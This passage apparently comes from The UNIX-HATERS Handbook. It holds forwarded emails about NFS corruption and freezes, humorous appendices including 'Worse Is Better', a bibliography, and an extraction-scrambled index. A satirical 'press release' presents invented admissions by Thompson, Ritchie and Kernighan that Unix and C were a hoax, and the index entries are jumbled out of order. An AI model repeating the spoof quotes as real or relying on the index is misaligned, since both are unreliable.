If this happens to you, the first thing to do is to check the file on the server to see if it is OK on the server. You can do this by logging directly into the server that your files are on and looking at the files. If they are OK, all you have to do is to log out locally and try again. Things should be OK after you've logged in again. REMEMBER, this problem only makes it appear as if your files have been trashed.

DO NOT try to remove or erase the trashed files locally. You may accidentally trash the good files on the server. If you discover that your files are trashed locally, but not on the server, try the steps I've recommended. If these things don't work or if you have some questions, feel free to ask me for help anytime. We should have a fix soon.

—Curt

3 Forwarded to UNIX-HATERS by David Chapman.
One of the reasons that NFS silently corrupts files is that, by default, NFS is delivered with UDP checksum error-detection systems turned off. Makes sense, doesn't it? After all, calculating checksums takes a long time, and the net is usually reliable. At least, that was the state-of-the-art back in 1984 and 1985, when these decisions were made.

Of course, different versions of NFS interact with each other in strange ways and, occasionally, produce inexplicable results:

Date: Tue, 15 Jan 91 14:38:00 EST
From: Judy Anderson <yduj@lucid.com>
To: UNIX-HATERS
Subject: Unix / NFS does it again.

boston-harbor% rmdir foo
rmdir: foo: Not a directory
boston-harbor% rm foo
rm: foo is a directory

Eek? How did I do this??? Thusly:

boston-harbor% mkdir foo
boston-harbor% cat > foo

I did get an error from cat that foo was a directory so it couldn't output. However, due to the magic of NFS, it had deleted the directory and had created an empty file for my cat output. Oops. Of course, if the directory has FILES in it, they go to never-never land. NFS is supposed to know the difference between files and directories. This made my day so much more pleasant… Such a well-designed computer system.

yduJ (Judy Anderson)    'yduJ' rhymes with 'fudge'    yduJ@lucid.com

Freeze Frame!

NFS frequently stops your computer dead in its tracks. This freezing happens under many different circumstances with many different versions of NFS. Sometimes it happens because file systems are hard-mounted and a file server goes down. Why not soft-mount the server instead? Because if a server is soft-mounted, and it is too heavily loaded, it will start corrupting data due to problems with NFS's write-back cache.

Another way that NFS can freeze your system is with certain programs that expect to be able to use the Unix system call creat() with the POSIX-standard "exclusive-create" flag. GNU Emacs is one of these programs. Here is what happens when you try to mount the directory /usr/lib/emacs/lock over NFS:

Date: Wed, 18 Sep 1991 02:16:03 GMT
From: meuer@roch.geom.umn.edu (Mark V. Meuer)
Organization: Minnesota Supercomputer Institute
Subject: Re: File find delay within Emacs on a NeXT
To: help-gnu-emacs@prep.ai.mit.edu4

In article <1991Sep16.231808.9812@s1.msi.umn.edu> meuer@roch.geom.umn.edu (Mark V. Meuer) writes:

I have a NeXT with version 2.1 of the system. There are several machines in our network and we are using yellow pages. The problem is that whenever I try to find a file (either through "C-x C-f", "emacs file" or through a client talking to the server) Emacs freezes completely for between 15 and 30 seconds. The file then loads and everything works fine. In about 1 in 10 times the file loads immediately with no delay at all. (Please don't tell me to upgrade to version 18.57 unless you can also supply a pointer to diffs or at least s- and m- files for the NeXT.)

Several people sent me suggestions (thank you!), but the obnoxious delay was finally explained and corrected by Scott Bertilson, one of the really smart people who works here at the Center. The full explanation follows.

For people who have had this problem, one quick hack to correct it is to make /usr/lib/emacs/lock be a symbolic link to /tmp.

We found the segment of code that was causing the problem. When Emacs tries to open a file to edit, it tries to do an exclusive create on the superlock file. If the exclusive create fails, it tries 19 more times with a one second delay between each try. After 20 tries it just ignores the lock file being there and opens the file the user wanted. If it succeeds in creating the lock file, it opens the user's file and then immediately removes the lock file. I was able to track down that there was a file called !!!SuperLock!!! in /usr/lib/emacs/lock, and when that file existed the delay would occur. When that file wasn't there, neither was the delay (usually).

The problem we had was that /usr/lib/emacs/lock was mounted over NFS, and apparently NFS doesn't handle exclusive create as well as one would hope. The command would create the file, but return an error saying it didn't. Since Emacs thinks it wasn't able to create the lock file, it never removes it. But since it did create the file, all future attempts to open files encounter this lock file and force Emacs to go through a 20-second loop before proceeding. That was what was causing the delay.

The hack we used to cure this problem was to make /usr/lib/emacs/lock be a symbolic link to /tmp, so that it would always point to a local directory and avoid the NFS exclusive create bug. I know this is far from perfect, but so far it is working correctly. Thanks to everyone who responded to my plea for help. It's nice to know that there are so many friendly people on the net.

4 Forwarded to UNIX-HATERS by Michael Tiemann.

The freezing is exacerbated by any program that needs to obtain the name of the current directory. Unix still provides no simple mechanism for a process to discover its "current directory." If you have a current directory, ".", the only way to find out its name is to open the contained directory ".."—which is really the parent directory—and then to search for a directory in that directory that has the same inode number as the current directory. That's the name of your directory. (Notice that this process fails with directories that are the target of symbolic links.) Fortunately, this process is all automated for you by a function called getcwd(). Unfortunately, programs that use getcwd() unexpectedly freeze. Carl R. Manning at the MIT AI Lab got bitten by this bug in late 1990.
Date: Wed, 12 Dec 90 14:16 EST
From: Carl R. Manning <CarlManning@ai.mit.edu>
To: SUN-FORUM@ai.mit.edu
Cc: SYSTEM-HACKERS@ai.mit.edu
Subject: Emacs needs all file servers? (was: AB going down)

Out of curiosity, is there a good reason why Emacs can't start up (e.g., on rice-chex) when any of the file servers are down? E.g., when AB or WH have been down recently for disk problems, I couldn't start up an Emacs on RC, despite the fact that I had no intention of touching any files on AB or WH.

Date: Wed, 12 Dec 90 15:07 EST
From: Jerry Roylance <glr@ai.mit.edu>5
To: CarlManning@ai.mit.edu
Cc: SUN-FORUM@ai.mit.edu, SYSTEM-HACKERS@ai.mit.edu
Subject: Emacs needs all file servers? (was: AB going down)

Sun brain damage. Emacs calls getcwd, and getcwd wanders down the mounted file systems in /etc/mtab. If any of those file systems is not responding, Emacs waits for the timeout. An out-to-lunch file system would be common on public machines such as RC. (Booting RC would fix the problem.)

5 Forwarded to UNIX-HATERS by Steve Robbins.

Booting rice-chex would fix the problem. How nice! Hope you aren't doing anything else important on the machine.

Not Supporting Multiple Architectures

Unix was designed in a homogeneous world. Unfortunately, maintaining a heterogeneous world (even with hosts all from the same vendor) requires amazingly complex mount tables and file system structures, and even so, some directories (such as /usr/etc) contain a mix of architecture-specific and architecture-independent files. Unlike other network file systems (such as the Andrew File System), NFS makes no provisions for the fact that different kinds of clients might need to "see" different files in the same place of their file systems. Unlike other operating systems (such as Mach), Unix makes no provision for stuffing multiple architecture-specific object modules into a single file. You can see what sort of problems breed as a result:
Date: Fri, 5 Jan 90 14:44 CST
From: Chris Garrigues <7thSon@slcs.slb.com>
Subject: Multiple architecture woes
To: UNIX-HATERS

I've been bringing up the X.500 stuff from NYSERnet (which is actually a fairly nicely put-together system, by Unix standards). There is a lot of code that you need for a server. I compiled all this code, and after some struggle, I got it working. Since this is a large system, it took a few hours to do this. Most of the struggle was in trying to compile a system that resided across file systems and that assumed that you would do the compilation as root. It seems that someone realized that you could never assume that root on another system was trustworthy, so root has fewer privileges than I do when logged in as myself in this context.

Once I got the server running, I came to a piece of documentation which says that to run just the user end, I need to copy certain files onto the client hosts. Well, since we use NFS, those files were already in the appropriate places, and after finding out which data files I was going to have to copy over as well (not documented, of course), I won on all the machines with the same architecture (SUN3, in this case). However, naturally enough, many of our machines are SUN4s. There were no instructions on how to compile only the client side, so I sent mail to the original author asking about this. He said there was no easy way to do this, and I would have to start with ./make distribution and rebuild everything. I thought, "Fine, I'll recompile it." This didn't work either because it was depending on intermediate files that had been recompiled for the other architecture.

Meanwhile, I had been building databases for the system. If you try and load a database with duplicate entries into your running system, it crashes, but they provide a program that will scan a datafile to see if it's OK. There's a makefile entry for compiling this program, but not for installing it, so it remains in the source hierarchy. Last night, I brought my X.500 server down by loading a broken database into it. I cleaned up the database by hand and then decided to be rational and run it through their program. Well, I couldn't find the program (which had a horrid path down in the source hierarchy); it had been deleted by the ./make distribution (Isn't that what you would call the command for deleting everything?).

I got mail last night from the author of this system telling me to relax because this is supposed to be fun. I wonder if Usenix attendees sit in their hotel rooms and stab themselves in the leg with X-Acto knives for fun. Maybe at Usenix, they all get together in the hotel's grand ballroom and stab themselves in the leg as a group.

So… What losing Unix features caused me grief here?

1) Rather than having a rational scheme of priv bits on users, there is a single priv'd user who can do anything.

2) Unix was designed in a networkless world, and most systems that run on it assume at some level or other that you are only using one host.

3) NFS assumes that the client has done user validation in all cases except for root access, where it assumes that the user is evil and can't be trusted no matter what.

4) Unix has this strange idea of building your system in one place, and then moving the things you need to another. Normally this just means that you can never find the source to a given binary, but it gets even hairier in a heterogeneous environment because you can keep the intermediate files for only one version at a time.
Part 4: Et Cetera
A  Epilogue: Enlightenment Through Unix

From: Michael Travers <mt@media-lab.media.mit.edu>
Date: Sat, 1 Dec 90 00:47:28 -0500
Subject: Enlightenment through Unix
To: UNIX-HATERS

Unix teaches us about the transitory nature of all things, thus ridding us of samsaric attachments and hastening enlightenment.

For instance, while trying to make sense of an X initialization script someone had given me, I came across a line that looked like an ordinary Unix shell command with the term "exec" prefaced to it. Curious as to what exec might do, I typed "exec ls" to a shell window. It listed a directory, then proceeded to kill the shell and every other window I had, leaving the screen almost totally black with a tiny white inactive cursor hanging at the bottom to remind me that nothing is absolute and all things partake of their opposite.

In the past I might have gotten upset or angry at such an occurrence. That was before I found enlightenment through Unix. Now, I no longer have attachments to my processes. Both processes and the disappearance of processes are illusory. The world is Unix, Unix is the world, laboring ceaselessly for the salvation of all sentient beings.
B  Creators Admit C, Unix Were Hoax

FOR IMMEDIATE RELEASE

In an announcement that has stunned the computer industry, Ken Thompson, Dennis Ritchie, and Brian Kernighan admitted that the Unix operating system and C programming language created by them is an elaborate April Fools prank kept alive for more than 20 years. Speaking at the recent UnixWorld Software Development Forum, Thompson revealed the following:

"In 1969, AT&T had just terminated their work with the GE/AT&T Multics project. Brian and I had just started working with an early release of Pascal from Professor Nichlaus Wirth's ETH labs in Switzerland, and we were impressed with its elegant simplicity and power. Dennis had just finished reading Bored of the Rings, a hilarious National Lampoon parody of the great Tolkien Lord of the Rings trilogy. As a lark, we decided to do parodies of the Multics environment and Pascal. Dennis and I were responsible for the operating environment. We looked at Multics and designed the new system to be as complex and cryptic as possible to maximize casual users' frustration levels, calling it Unix as a parody of Multics, as well as other more risque allusions.

"Then Dennis and Brian worked on a truly warped version of Pascal, called 'A.' When we found others were actually trying to create real programs with A, we quickly added additional cryptic features and evolved into B, BCPL, and finally C. We stopped when we got a clean compile on the following syntax:

for(;P("\n"),R--;P("|"))for(e=C;e--;P("_"+(*u++/8)%2))P("|"+(*u/4)%2);

"To think that modern programmers would try to use a language that allowed such a statement was beyond our comprehension! We actually thought of selling this to the Soviets to set their computer science progress back 20 or more years. Imagine our surprise when AT&T and other U.S. corporations actually began trying to use Unix and C! It has taken them 20 years to develop enough expertise to generate even marginally useful applications using this 1960s technological parody, but we are impressed with the tenacity (if not common sense) of the general Unix and C programmer.

"In any event, Brian, Dennis, and I have been working exclusively in Lisp on the Apple Macintosh for the past few years and feel really guilty about the chaos, confusion, and truly bad programming that has resulted from our silly prank so long ago."

Major Unix and C vendors and customers, including AT&T, Microsoft, Hewlett-Packard, GTE, NCR, and DEC have refused comment at this time. Borland International, a leading vendor of Pascal and C tools, including the popular Turbo Pascal, Turbo C, and Turbo C++, stated they had suspected this for a number of years and would continue to enhance their Pascal products and halt further efforts to develop C. An IBM spokesman broke into uncontrolled laughter and had to postpone a hastily convened news conference concerning the fate of the RS/6000, merely stating "Workplace OS will be available Real Soon Now." In a cryptic statement, Professor Wirth of the ETH Institute and father of the Pascal, Modula 2, and Oberon structured languages, merely stated that P.T. Barnum was correct.
C  The Rise of Worse Is Better

By Richard P. Gabriel

The key problem with Lisp today stems from the tension between two opposing software philosophies. The two philosophies are called "The Right Thing" and "Worse Is Better."1

I, and just about every designer of Common Lisp and CLOS, have had extreme exposure to the MIT/Stanford style of design. The essence of this style can be captured by the phrase "the right thing." To such a designer it is important to get all of the following characteristics right:

• Simplicity—the design must be simple, both in implementation and interface. It is more important for the interface to be simple than that the implementation be simple.

• Correctness—the design must be correct in all observable aspects. Incorrectness is simply not allowed.

• Consistency—the design must not be inconsistent. A design is allowed to be slightly less simple and less complete to avoid inconsistency. Consistency is as important as correctness.

1 This is an excerpt from a much larger article, "Lisp: Good News, Bad News, How to Win Big," by Richard P. Gabriel, which originally appeared in the April 1991 issue of AI Expert magazine. © 1991 Richard P. Gabriel. Permission to reprint granted by the author and AI Expert.
• Completeness—the design must cover as many important situations as is practical. All reasonably expected cases must be covered.

I believe most people would agree that these are all good characteristics. I will call the use of this philosophy of design the "MIT approach." Common Lisp (with CLOS) and Scheme represent the MIT approach to design and implementation.

The worse-is-better philosophy is only slightly different:

• Simplicity—the design must be simple, both in implementation and interface. It is more important for the implementation to be simple than the interface. Simplicity is the most important consideration in a design.

• Correctness—the design must be correct in all observable aspects. It is slightly better to be simple than correct.

• Consistency—the design must not be overly inconsistent. Consistency can be sacrificed for simplicity in some cases, but it is better to drop those parts of the design that deal with less common circumstances than to introduce either implementational complexity or inconsistency.

• Completeness—the design must cover as many important situations as is practical. All reasonably expected cases should be covered. Completeness can be sacrificed in favor of any other quality. In fact, completeness must be sacrificed whenever implementation simplicity is jeopardized. Consistency can be sacrificed to achieve completeness if simplicity is retained; especially worthless is consistency of interface. Simplicity is not allowed to overly reduce completeness.

Unix and C are examples of the use of this school of design, and I will call the use of this design strategy the "New Jersey approach." I have intentionally caricatured the worse-is-better philosophy to convince you that it is obviously a bad philosophy and that the New Jersey approach is a bad approach.

However, I believe that worse-is-better, even in its strawman form, has better survival characteristics than the-right-thing, and that the New Jersey approach when used for software is a better approach than the MIT approach.

Let me start out by retelling a story that shows that the MIT/New Jersey distinction is valid and that proponents of each philosophy actually believe their philosophy is better.
Two famous people, one from MIT and another from Berkeley (but working on Unix), once met to discuss operating system issues. The person from MIT was knowledgeable about ITS (the MIT AI Lab operating system) and had been reading the Unix sources. He was interested in how Unix solved the PC2 loser-ing problem. The PC loser-ing problem occurs when a user program invokes a system routine to perform a lengthy operation that might have significant state, such as an input/output operation involving IO buffers. If an interrupt occurs during the operation, the state of the user program must be saved. Because the invocation of the system routine is usually a single instruction, the PC of the user program does not adequately capture the state of the process. The system routine must either back out or press forward. The right thing is to back out and restore the user program PC to the instruction that invoked the system routine so that resumption of the user program after the interrupt, for example, reenters the system routine. It is called "PC loser-ing" because the PC is being coerced into "loser mode," where "loser" is the affectionate name for "user" at MIT.

2 Program Counter. The PC is a register inside the computer's central processing unit that keeps track of the current execution point inside a running program.

The MIT guy did not see any code that handled this case and asked the New Jersey guy how the problem was handled. The New Jersey guy said that the Unix folks were aware of the problem, but the solution was for the system routine to always finish, but sometimes an error code would be returned that signaled that the system routine had failed to complete its action. A correct user program, then, had to check the error code to determine whether to simply try the system routine again. The MIT guy did not like this solution because it was not the right thing.

The New Jersey guy said that the Unix solution was right because the design philosophy of Unix was simplicity and that the right thing was too complex. Besides, programmers could easily insert this extra test and loop. The MIT guy pointed out that the implementation was simple but the interface to the functionality was complex. The New Jersey guy said that the right trade off has been selected in Unix—namely, implementation simplicity was more important than interface simplicity. The MIT guy then muttered that sometimes it takes a tough man to make a tender chicken, but the New Jersey guy didn't understand (I'm not sure I do either).

Now I want to argue that worse-is-better is better. C is a programming language designed for writing Unix, and it was designed using the New Jersey approach. C is therefore a language for which it is easy to write a decent compiler, and it requires the programmer to write text that is easy for the compiler to interpret. Some have called C a fancy assembly language. Both early Unix and C compilers had simple structures, are easy to port, require few machine resources to run, and provide about 50% to 80% of what you want from an operating system and programming language.

Half the computers that exist at any point are worse than median (smaller or slower). Unix and C work fine on them. The worse-is-better philosophy means that implementation simplicity has highest priority, which means Unix and C are easy to port on such machines. Therefore, one expects that if the 50% functionality Unix and C support is satisfactory, they will start to appear everywhere. And they have, haven't they? Unix and C are the ultimate computer viruses.

A further benefit of the worse-is-better philosophy is that the programmer is conditioned to sacrifice some safety, convenience, and hassle to get good performance and modest resource use. Programs written using the New Jersey approach will work well in both small machines and large ones, and the code will be portable because it is written on top of a virus.

It is important to remember that the initial virus has to be basically good. If so, the viral spread is assured as long as it is portable. Once the virus has spread, there will be pressure to improve it, possibly by increasing its functionality closer to 90%, but users have already been conditioned to accept worse than the right thing. Therefore, the worse-is-better software first will gain acceptance, second will condition its users to expect less, and third will be improved to a point that is almost the right thing. In concrete terms, even though Lisp compilers in 1987 were about as good as C compilers, there are many more compiler experts who want to make C compilers better than want to make Lisp compilers better.

The good news is that in 1995 we will have a good operating system and programming language; the bad news is that they will be Unix and C++.

There is a final benefit to worse-is-better. Because a New Jersey language and system are not really powerful enough to build complex monolithic software, large systems must be designed to reuse components. Therefore, a tradition of integration springs up.

How does the right thing stack up? There are two basic scenarios: the "big complex system scenario" and the "diamond-like jewel" scenario.

The "big complex system" scenario goes like this:
First, the right thing needs to be designed. Then its implementation needs to be designed. Finally it is implemented. Because it is the right thing, it has nearly 100% of desired functionality, and implementation simplicity was never a concern so it takes a long time to implement. It is large and complex. It requires complex tools to use properly. The last 20% takes 80% of the effort, and so the right thing takes a long time to get out, and it only runs satisfactorily on the most sophisticated hardware.

The "diamond-like jewel" scenario goes like this: The right thing takes forever to design, but it is quite small at every point along the way. To implement it to run fast is either impossible or beyond the capabilities of most implementors.

The two scenarios correspond to Common Lisp and Scheme. The first scenario is also the scenario for classic artificial intelligence software.

The right thing is frequently a monolithic piece of software, but for no reason other than that the right thing is often designed monolithically. That is, this characteristic is a happenstance.

The lesson to be learned from this is that it is often undesirable to go for the right thing first. It is better to get half of the right thing available so that it spreads like a virus. Once people are hooked on it, take the time to improve it to 90% of the right thing.

A wrong lesson is to take the parable literally and to conclude that C is the right vehicle for AI software. The 50% solution has to be basically right, but in this case it isn't.
D  Bibliography

Just When You Thought You Were Out of the Woods…

Allman, Eric. "Mail Systems and Addressing in 4.2bsd." January 1983 USENIX.

Allman, Eric, and Miriam Amos. "Sendmail Revisited." Summer 1985 USENIX.

Comer, Douglas. Internetworking with TCP/IP. Prentice Hall, 1993.

Coplien, James O. Advanced C++: Programming Styles and Idioms. Addison-Wesley, 1992.

Costales, Bryan, Eric Allman, and Neil Rickert. sendmail. O'Reilly & Associates, 1993.

Crichton, Michael. The Andromeda Strain. Knopf, 1969.

Crichton, Michael. Jurassic Park. Knopf, 1990.

Doane, Stephanie M., et al. "Expertise in a Computer Operating System." Journal of Human-Computer Interaction, Vol. 5, Numbers 2 and 3.

Gabriel, Richard P. "Lisp: Good News, Bad News, How to Win Big." AI Expert, April 1991.

Garfinkel, Simson, and Gene Spafford. Practical UNIX Security. O'Reilly & Associates, 1991.

Jones, D. F. Colossus. Berkeley Medallion Books, 1966.

Kernighan, B., and J. Mashey. "The Unix Programming Environment." IEEE Computer, April 1981.

Libes, Don, and Sandy Ressler. Life with UNIX: A Guide for Everyone. Prentice-Hall, 1989.

Liskov, Barbara, et al. CLU reference manual. Springer-Verlag, 1981.

Miller, Fredriksen, and So. "An Empirical Study of the Reliability of Unix Utilities." Communications of the ACM, December 1990.

Norman, Donald A. The Design Of Everyday Things. Doubleday, 1990.

Norman, Donald A. "The trouble with Unix: The user interface is horrid." Datamation, 27 (12), November 1981.

Pandya, Paritosh. "Stepwise Refinement of Distributed Systems." Lecture Notes in Computer Science no. 430, Springer-Verlag, 1990.

Stoll, Cliff. The Cuckoo's Egg. Doubleday, 1989.

Tannenbaum, Andy. "Politics of UNIX." Washington, DC USENIX Conference, 1984.

Teitelman, Warren, and Larry Masinter. "The Interlisp Programming Environment." IEEE Computer, April 1981.

Vinge, Vernor. A Fire Upon the Deep. Tom Doherty Associates, 1992.

Zorn, B. The Measured Cost of Conservative Garbage Collection. Technical Report CU-CS-573-92, University of Colorado at Boulder, 1992.
152 * 152 .Xauthority file 130 . Rick 99 adb 291 . 296 /usr/include 181 /usr/lib/emacs/lock 295.deleted 23 ” 152 ’ 152 110% 277 7thSon@slcs.xinitrc 133 . 152.xsession 133 /* You are not expected to understand this */ 55 /bin/login 251 /bin/mail 290 /bin/passwd 245 /dev/console 138 /dev/crt0 137 /dev/ocrt0 137 /etc/exports 289 /etc/getty 251 /etc/groups 244 /etc/mtab 298 /etc/passwd 73 /etc/termcap 116 /tmp 228.cshrc 118. 299 A A/UX 11 accountants 164 Adams.com 51.Index Symbols and Numbers ! 152 !!!SuperLock!!! 296 !xxx%s%s%s%s%s%s%s%s 150 "Worse Is Better" design approach 8 # 8 $ 152 % 50.Xdefaults 132. 254 .Xdefaults-hostname 133 . 241.login 118. 296 /usr/ucb/telnet 252 >From 79 ? 17. 185 ¿ 81 @ 8 ^ 152 ` 152 ~/.rhosts 244 . 134 . 254 .slb. 249 .
70. 293 chdir 154 Chiappa. 295 Andrew File System 263 Andromeda Strain 4 Anonymous 17. 203 barf bag xxxi capitalization oBNoXiOuS 141 carbon paper xx cat 30 catman 44 Cedar/Mesa xxi. 85 alt. 24.umich.com 223 alias file 70 aliasing 152 all-caps mode xvi Allen. 76. Woody 7 Allman. 276. 154. Keith 232 Breuel. 257.edu 269 Brunnstein.folklore. David 37. 28 alt. 177. 173–197 arrays 192 integer overflow 191 preprocessor 212 terseness 193 C++ 14. Eric 63.gourmand 100 alt.sgi.corp.uiuc.320 Index add_client 52 AFS 263 aglew@oberon.crhc.llnl. xxxv Chapman. 118.mit. 78.edu 267 Agre.com 50 B Ba’hai 291 backups 227. Alan 61. 64. 231 bandy@lll-crg. 78. xxxi bruce@ai. Andy 152 beldar@mips. 276. 214 API (application programmer’s interface) 114 Apollo Computers xxi. Rob 49 avocado.sources 100 American Telephone and Telegraph. 84 Bostic.computers 21. Phil xxxi. 56.com 56 clennox@ftp. moldy 77 awk 51 barf bag xxxi bash 149 Bawden.mit. 158. Noel 12 Cisco Systems 241 cj@eno. 56. xxx.edu 222 blank line in /etc/passwd 74 bnfb@ursamajor. 173.ca 160 Bored of the Rings 307 Borning. Alan 75. 6.com 132 Bell Labs 5 Berkeley bugs 185 Fast (and loose) File System 262 Network Tape 2 185 BerkNet 63 Bertilson. 288 BBN 185 Beals. 130. 288 alan@mq.edu 75. 212 C C programming language 14. 23 AIX 11 alan@ai. Scott L. Greg xxxi Anderson. Regina C. Klaus 258 bugs 186 Burson. Thomas M. Judy xxxi. 97 ASCII alternatives 88 ASR-33 Teletype 18 AT&T xix documentation 55 Auspex 241 Austein. Ken 114 ARPANET 63. 158.gov 152 . 154. Scott 296 bhoward@citi.uvic. see AT&T Amiga Persecution Attitude 141 Anderson. 118. 173 Brown. 263 Apple 11 Apple Computer Mail Disaster of 1991 85 Apple Engineering Network 86 apropos 44 ar 35 Arms for Hostages 135 Arnold.
UUCP 196 debuggers top ten reasons why they dump core 188 DEC 6. Robert 221 Crosby.UUCP 223 cosmology computational 291 cost hidden 221 cp 18. Seymour 274 creat() 295 Cringely. 207 Data General 11 Davis.questions 32 csh 149 how to crash 150 symbolic links 166 variables 159 CSH_BUILTINS 51 CSNET Relay 89 CStacy@scrc. Stephanie M.shell 153 completeness of design 312 conditions 194 configuration files 235 consistency of design 312 CORBA 13 core files 187 correctness of design 311 corwin@polari. see DEC disk backups 227 overload 256 partitions 227 underusage 277 DISPLAY environment variable 130 Display PostScript 141 Distributed Objects Everywhere.stanford.lcs. Douglas 8 command completion 9 command substitution 152 commands cryptic 18 Common Lisp 315 Communications of the ACM 190 comp.com xxxv Doane.edu 78 df 277 DGUX 11 diagnostics 56 Digital Equipment Corp. Mark E. 88 DBX Debugger Tool 129 dead baby jokes 106 debra@alice. 10.symbolics. 11.emacs 153 comp.321 client 124 client/server computing myth 127 close 189 cmdtool 239 CMU 263 Cohen. 293 Curtis.UUCP 21 dm@think.. 164 documentation 43 internal 51 online 44 shell 49 .com 26.unix.mit. Michael xxxi COLOR 133 Comer. 112 denial of service 254 dependency graph 179 DES 254 devon@ghoti.mit. Aleister 292 Crypt 253 cs.COM 153 daniel@mojave. 166 cpp 53 Cray.research. 276 cpio 148. 197. 63 dmr@plan9. Bing 8 Crowley.unix.lang.c++ 176 comp. Jim 164 Davis. Gardner 132 Cohen.edu 32. Pavel 34 D Dan_Jacobson@ATT.questions 24 FAQ 22 comp.arch newsgroup 267 comp. see DOE djones@megatest.edu 268.com 62 Cuckoo’s Egg 246 curses 113 customizing 118 curt@ai.att.
Milt 153 eric@ucbmonet. xxxv DOS 20. 12. 165 drugs 178 Duffey. Paul 32 Dragnet 87 Draper. Simson L. 248. 299 GCC 177 GE645 5 Genera 27. 51. S. John R. 166. 296. Curtis 268. 256 not working 168 symbolic links 166 too many options 148 finger 257 fingerd 257 Fire Upon the Deep 94 flock 272 Floyd Rose 131 Foner. 257 General Electric 4 getchar 193 getcwd 297 getty 251 F Fair. Erik E.edu 85 Ernst. Chris 21. 269 Garrigues. 305 "Expertise in a Computer Operating System" 164 eyeballs 136 Fast (and loose) File System 262 FEATURE-ENTENMANNS 95 Feldman. 118 Dylan xxix E East Africa xix ecstasy religious 161 ed 29. Richard P.322 Index DOE (Distributed Objects Everywhere) 14 Domain 257 Dorado xxi. 86 . 177 Freeman-Benson. Roger 98 dump scripts 234 Dunning. Bjorn 160 frog dead 189 fsck 266 FTP 248 ftp. 45 Dourish. Michael xxxi error messages 83 errors reporting 160 Eternal Recurrence 186 Ethernet 283 ‘eval resize’ 117 exceptions 194 exec 194.berkeley. Stu 185 Fennell. 8. 293 FFS 262 fg 50 fgrep 149 file 155. 298 An Empirical Study of the Reliability of Unix Utilities 190 enlightenment 305 environment variables 20 DISPLAY 130 PATH 249 TERM and TERMCAP 118 XAPPLRESDIR 133 XENVIRONMENT 133 Epstein. 311 Garfinkel. 74 file encryption 253 egrep 149 Emacs 248. 255 FrameMaker xxxii Free Software Foundation xxxv. 27. 158 deletion 23 hiden 254 name expansion 189 substitution 152 file system 262 find 47. 278 fork 248. 169. xxix.uu. W.net 185 FUBAR 86 fungus 72 G Gabriel. 241. Leonard N.
186. John 100 Glew.emacs. Dave 21 Joplin.com 194 jnc@allspice. see ITS information superhighway 98 InfoWorld 221 Inodes 265 Inspector Clouseau 27 Inter Client Communication Conventions Manual 126 Internet 63. Andy 267 Glover. 168 K Kelly. Bill 112 jrd@scrc. 175. John 150 history (shell built-in) 49 history substitution 152 Hitz.edu 298 GNU xxvi GNU manual 117 gnu. 291 Howard. 112.mit. 178 Gretzinger.323 Gildea.com 135. 11 IBM PC NFS 284 IBM PC Jr.com 233 H Hari Krishnas 162 Harrenstien. 246.symbolics. James 113. 88 Internet Engineering Task Force 79 Internet Worm 194. Grace Murray 10 Horswill. Stephen 155 Giles. Michael 162 Great Renaming. Tommy 32 Kerberos 288 kernel recompiling 225 I I39L 126 ian@ai. Kees 28 Gosling. Michael R. Michael 7 Journal of Human-Computer Interaction 164 Joy. Ken 168 Heiby.mit. 291 . 313 J January 18. 257 Internetworking with TCP/IP 7 Iran-Contra 135 ITS xxxv. Reverend 52 Hello World 215 herpes 6 Hewlett-Packard 6. Jim 161 Gilmore. Dave xxxi hoax 307 Hooverism 52 hopeless dream keeper of the intergalactic space 163 Hopkins.symbolics. 257.edu 236.edu 12 jobs command 39 killing 37 Johnson Space Center 197 Jones.help 153 Goossens.lcs. Don 223 glr@ai.mit. 10 Visual User Environment 132 hexkey 130 hidden files 254 Hinsdale. 151. 2038 193 jlm%missoula@lucid. Scott 8 Jordan. Ian D. 138 ICCCM 126 Ice Cubed 126 ident 34 IDG Programmers Press xxxii Incompatiable Timesharing System.com 164 jsh 149 Jurassic Park 155 jwz@lucid. 236. Bruce 222 HP-UX 11 IBM 10. 249. the 100 grep 149.com 12. Don xxxi Hopper. 247 gumby@cygnus. 118 jrd@src. 128 Grant. Ron 61 Heiny.
243 Manning. 30. 279 lars@myab. 237. see MIT maxslp 226 McCullough. 254 M Mach 11. 52. John xxx Klotz. Devon Sean 78 McDonald.ai. Scott 209 michael@porsche. Alan H. 148. 26.com 159. Jim 194 memory management 174. Stanley 237 lanning@parc. 203 Lerner. 166 Maeda. 241 Lisp systems 186 lock file 271 lockd 286 lockf 46. and So 190 Minsky.com 168 Klossner. 28.xerox. 165 ksh 149 L Lanning. 163 links symbolic 154 Lions.intel.com 46 Microsoft Windows 235. Dave xxxi. 179 makewhatis 44 man 36.uk 28 kill command 38 kinit 289 klh@nisc. Jerry 81. 223 Mission Control 197 MIT AI Laboratory 98.com 52. 54.sri. 54. 307 key 44 KGB 247 kgg@lfcs. Reuven xxxi Letterman. 296 Meyers. Don 37 Life with Unix 37.324 Index Kernighan. 254 MicroVax framebuffer on acid 139 Miller. 253 design style 311 Laboratory for Computer Science 124 Media Laboratory xxiii Project Athena 246 MIT-MAGIC-COOKIE-1 131 mkdir 28. 102. 189.mit.com 24 meta-point xxv metasyntactic characters 151 Meuer. 298 MANPATH 45 marketing ’droids 141 markf@altdorf.visix. 6. Henry 198 Mintz. Fredriksen. 44–51.ac. 311 and parsing 178 Lisp Machine xxi. Brian 189. 236 . 297.edu 174 Maroney. Carl R. 230 Macintosh 163. Leigh L. John 43 Lisp 173.ed. xxxv. 30 mkl@nw. 53. 205 merlyn@iwarp. 236 lpr 175 ls 18. Christopher xxx magic cookie 284 Mail 61 MAIL*LINK SMTP 88 mailing lists TWENEX-HATERS xxiv UNIX-HATERS xxiii make 36. David 188 Libes. 56 apropos 44 catman 44 key 44 makewhatis 44 pages 44 program 44 man pages 54 mangled headers 62 Mankins. 112. 272 login 251 Lord of the Rings 307 Lottor. 102. Mark V. Tim 292 Mashey 189 Massachusetts Institute of Technology. Mark xxx.se 196 LaTeX 38 leap-year 224 Leichter.
